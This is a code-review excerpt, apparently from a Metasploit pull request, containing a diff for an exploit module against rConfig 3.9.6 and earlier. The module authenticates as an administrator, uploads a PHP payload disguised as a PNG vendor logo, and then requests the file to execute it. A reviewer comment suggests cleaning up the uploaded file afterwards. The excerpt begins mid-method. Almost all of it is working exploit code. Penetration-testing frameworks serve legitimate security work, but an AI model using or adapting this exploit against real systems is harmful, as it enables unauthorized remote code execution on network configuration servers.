modules/exploits/linux/http/rconfig_authenticated_rce.rb

```diff
@@ -0,0 +1,164 @@
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/login.php')
+    })
+
+    fail_with Failure::Unreachable "Target #{RHOST} could not be reached." unless r
+    cookie = r.get_cookies
+
+    r = send_request_cgi!(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/lib/crud/userprocess.php'),
+      'headers' => {
+        'Origin' => full_uri(''),
+        'Referer' => "#{full_uri}/login.php"
+      },
+      'cookie' => cookie,
+      'vars_post' => {
+        'user' => datastore['USERNAME'],
+        'pass' => datastore['PASSWORD'],
+        'sublogin' => '1'
+      }
+    )
+
+    fail_with Failure::Unreachable "Target #{RHOST} could not be reached." unless r
+
+    if r.body.to_s.include?('Invalid')
+      fail_with Failure::BadConfig, 'The admin credentials given are incorrect'
+    end
+
+    if r.headers.include?('location')
+      print_good 'We successfully logged in !'
+    else
+      fail_with Failure::UnexpectedReply, 'Unexpected reply as auth redirection didn\'t work'
+    end
+
+    cookie
+  end
+
+  def check
+    r = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/login.php')
+    })
+
+    if r&.code == 200
+
+      version = r.body.to_s.match(/Version (\d*).(\d*).(\d*)/)
+
+      if version
+
+        print_good(version[0] + ' of rConfig found !')
+
+        if version[1].to_i < 3 || (version[1].to_i == 3 && version[2].to_i < 9) || (version[1].to_i == 3 && version[2].to_i == 9 && version[3].to_i <= 6)
+          CheckCode::Vulnerable
+        else
+          CheckCode::Safe('Only versions <= 3.9.6 are vulnerable !')
+        end
+      else
+        CheckCode::Unknown('Version of rConfig not found !')
+      end
+    else
+      CheckCode::Unknown("Can't access the rConfig web interface !")
+    end
+  end
+
+  def exploit
+    cookie = authenticate
+    filename = Rex::Text.rand_text_alpha_lower(5) + '.php'
+
+    post_data = Rex::MIME::Message.new
+    post_data.add_part('thisisrce', nil, nil, 'form-data; name="vendorName"')
+    post_data.add_part(payload.encoded, 'image/png', nil, "form-data; name='vendorLogo'; filename=#{filename}")
+    post_data.add_part('add', nil, nil, 'form-data; name="add"')
+    post_data.add_part('', nil, nil, 'form-data; name="editid"')
+
+    print_status("Uploading file \'#{filename}\' containing the payload...")
+
+    r = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/lib/crud/vendors.crud.php'),
+      'headers' => {
+        'Origin' => full_uri('')
+      },
+      'cookie' => cookie,
+      'data' => post_data.to_s,
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
+    )
+
+    if r&.code == 302
+
+      print_status('Triggering the payload ...')
+      send_request_cgi(
+        'method' => 'GET',
+        'cookie' => cookie,
+        'uri' => normalize_uri(target_uri.path, "/images/vendor/#{filename}")
+      )
```

Comment:
If the file upload is successful, let's make sure to delete it once the exploit has finished. This can be done with the `register_file_for_cleanup()` method from the `Msf::Exploit::FileDropper` mixin (will need to be included in the module):

```suggestion
    if r&.code == 302
      register_file_for_cleanup(filename)
      print_status('Triggering the payload ...')
      send_request_cgi(
        'method' => 'GET',
        'cookie' => cookie,
        'uri' => normalize_uri(target_uri.path, "/images/vendor/#{filename}")
      )
```